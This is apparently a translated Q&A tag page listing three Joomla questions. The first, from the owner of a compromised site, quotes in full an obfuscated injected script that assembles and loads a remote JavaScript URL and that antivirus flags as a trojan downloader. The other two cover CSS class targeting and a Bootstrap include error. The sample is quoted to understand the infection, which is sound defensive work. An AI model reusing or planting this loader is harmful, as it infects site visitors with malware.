Questions tagged «joomla»

8
该站点感染脚本如何工作?
我的Joomla!网站已被多次入侵。有人以某种方式设法将以下垃圾注入了关键的php脚本,但我的意思是不谈论配置Joomla。该站点的访问量很少(有时我担心我可能是该站点的唯一访问者...),而且我不太在乎如何备份和运行该站点。我最终会解决的。 我的问题是,这种垃圾如何起作用?我看了一下,只是看不出这怎么造成任何伤害?它的作用是尝试下载一个名为ChangeLog.pdf的PDF文件,该文件感染了特洛伊木马,打开后将冻结Acrobat,并在计算机上造成严重破坏。它是如何做到的,我不知道,我不在乎。但是下面的脚本如何调用下载? <script>/*Exception*/ document.write('<script src='+'h#^(t@)((t$&@p#:)&/!$/)@d$y#^#$n@$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^@g))!a#m#@$e&$s^@@!t@@($!o@$p(.&@c&)@(o$m)).!$m$)y@(b@e()s&$t$@y&o$&(u#)$x&&^(i)-@^c!!&n$#.(@g)$e#(^n&!u(i&#&n(e&(!h&o@&^&l^$(l)&y$(#@w!o@!((o#d&^.^#)r$#^u!!$:(#@&8#)(0$8@&0^(/))s#o#^&#^f!$t$!o##n(&$i(^!c$(.!&c@o!&^m#&/&(s&$(o!f&!t@&o!!n)&i$&c!.#^^c)!$o@@((m@#/$^!g#^o$^&o&#g!l)@@@!e&.))c!)(o#@#^!m(&/^^l#^@i##(v&@e&)!$j^!a@$s#m!i)n$.!$c&$o)@$m^/@$v&i^d^()e(!o&&s@(z(@)^.@)c$&o^m)$)^/#$'.replace(/#|\$|@|\^|&|\(|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script> <!--6f471c20c9b96fed179c85ffdd3365cf--> ESET已将此代码检测为JS / TrojanDownloader.Agent.NRO木马

2
在另一个CSS类中定位一个CSS类
嗨,我在joomla中的某些CSS类遇到问题。我在模块中有两个div,一个是包装类class =“ wrapper”,另一个是内容类class =“ content”。内容在包装器内。我想做的是针对Content类上的CSS样式。通常,我只将.content {我的样式信息}放在样式表中,但是问题是此类在整个页面中多次使用。因此,在后端,您可以为模块分配一个类名,因此我将其称为.testimonials。 为了避免更改页面上的所有其他内容类,我尝试通过以下操作将其定位: .testimonials .content {my style info I am trying to apply} 但它不起作用,我知道您可以使用div来做到这一点,所以 #testimonials .content {my style info I am trying to apply} 但是我的问题是可以使用类吗?如果这样,在尝试使用以下方法时出现了问题: .testimonials .content {font-size:12px; width:300px !important;} 由于某种原因,内容没有包装并且仅在本段末尾消失了,所以我试图确保内容所在的1级课程没有任何重叠,奇怪的是即使我修复了内容位于50px的div类,它仍然不会包装文本,因此我不确定是否将其定位为对吗? 编辑>>>>>>>>>> .. Joomla创建的html基本上是这样的>> <div class="wrapper"> <div class="content">SOME CONTENT</div </div> 然后将其包装成其他具有良好Joomla风格的div。 我给模块提供了推荐类别,因此最终看起来像: <div class="testimonials"> <div class="wrapper"> …
90 html  css  joomla  module 

1
与Joomla捆绑在一起的Bootstrap 2.1.0中的“未捕获的SyntaxError:意外令牌{”!3.0
我正在使用Joomla!3.0,其中包括Twitter Bootstrap 2.1.0。我想做我自己的Joomla!模板,则需要使用下拉菜单。当我包含以下CSS / JS时: <script src="http://code.jquery.com/jquery-1.9.1.min.js"></script> <script type="text/javascript" src="<?php echo $this->baseurl ?>/media/jui/js/bootstrap.min.js"></script> <script type="text/javascript" src="<?php echo $this->baseurl ?>/media/jui/css/bootstrap.css"></script> <link href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template; ?>/css/Site.css" rel="stylesheet" type="text/css"> <link rel="shotcut icon" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template; ?>/css/images/favicon.ico" type="image/x-icon"> 我收到以下CSS错误: Uncaught SyntaxError: Unexpected token { 在/media/jui/css/bootstrap.css第19行
By using our site, you acknowledge that you have read and understand our Cookie Policy and Privacy Policy.
Licensed under cc by-sa 3.0 with attribution required.